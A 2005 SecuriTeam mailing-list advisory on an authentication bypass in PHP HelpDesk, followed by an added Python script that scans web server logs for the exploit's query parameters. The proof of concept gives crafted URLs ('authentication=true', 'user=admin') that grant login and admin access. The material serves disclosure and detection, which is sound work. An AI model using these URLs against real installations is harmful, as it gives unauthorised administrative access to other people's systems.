[UNIX] PHP HelpDesk Authentication Bypass (Exploit)

From: SecuriTeam (support_at_securiteam.com)
Date: 10/11/05

    To: list@securiteam.com
    Date: 11 Oct 2005 12:05:54 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      PHP HelpDesk Authentication Bypass (Exploit)
    ------------------------------------------------------------------------

    SUMMARY

     <https://sourceforge.net/projects/phphelpdesk/> PHP Helpdesk is "a tool
    that allows administrators to handle tasks related to their organisation.
    This tool is used to record and monitor the progress of tasks assigned to
    people. This is an excellent and simple tool for handling tasks". PHP
    Helpdesk has a fault in the way it implements the cookie values it sets.
    Using crafted URLs it is possible to get full access to the system.

    DETAILS

    Proof of Concept:
    Access a site that holds the login to PHP HelpDesk
    http://www.target.com/helpdesk/index.php

    Change the system so that you are authenticated
    http://www.target.com/helpdesk/index.php?authentication=true

    Raise your privileges to admin
    http://www.target.com/helpdesk/index.php?authentication=true&user=admin

    ADDITIONAL INFORMATION

    The information has been provided by
    <mailto:taylorg@southport-college.ac.uk> Garry Taylor.

    ========================================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
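
For defenders reviewing web server logs for the requests shown in the proof of concept, the following is an added example (not part of the advisory and not PHP HelpDesk code). It assumes Apache/nginx "combined" access-log format and that the application is served from a path ending in `/index.php`; the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters the advisory's proof of concept supplies in the URL.
STATE_PARAMS = {"authentication", "user"}

# Leading fields of a "combined" access-log entry (assumed log format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def suspicious_params(target):
    """Return the auth-state parameters found in a request target's query string."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/index.php"):
        return {}
    # parse_qs percent-decodes names and values, so encoded spellings are caught too.
    query = parse_qs(parts.query, keep_blank_values=True)
    return {k.lower(): v for k, v in query.items() if k.lower() in STATE_PARAMS}

def scan(lines):
    """Yield (ip, timestamp, status, params) for each log line carrying such parameters."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        hits = suspicious_params(m["target"])
        if hits:
            yield m["ip"], m["ts"], int(m["status"]), hits

# Constructed sample log lines (documentation address ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [11/Oct/2005:12:10:01 +0200] "GET /helpdesk/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [11/Oct/2005:12:11:43 +0200] "GET /helpdesk/index.php?authentication=true HTTP/1.1" 200 7301 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [11/Oct/2005:12:11:59 +0200] "GET /helpdesk/index.php?%61uthentication=true&user=admin HTTP/1.1" 200 9944 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [11/Oct/2005:12:12:30 +0200] "GET /helpdesk/style.css?user=admin HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, ts, status, hits in scan(SAMPLE_LOG):
        print(f"{ts} {ip} status={status} params={hits}")
```

Access logs normally record only the query string, so the same parameters sent in a request body would not appear here. Treat each match as a lead to review against session and application logs.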

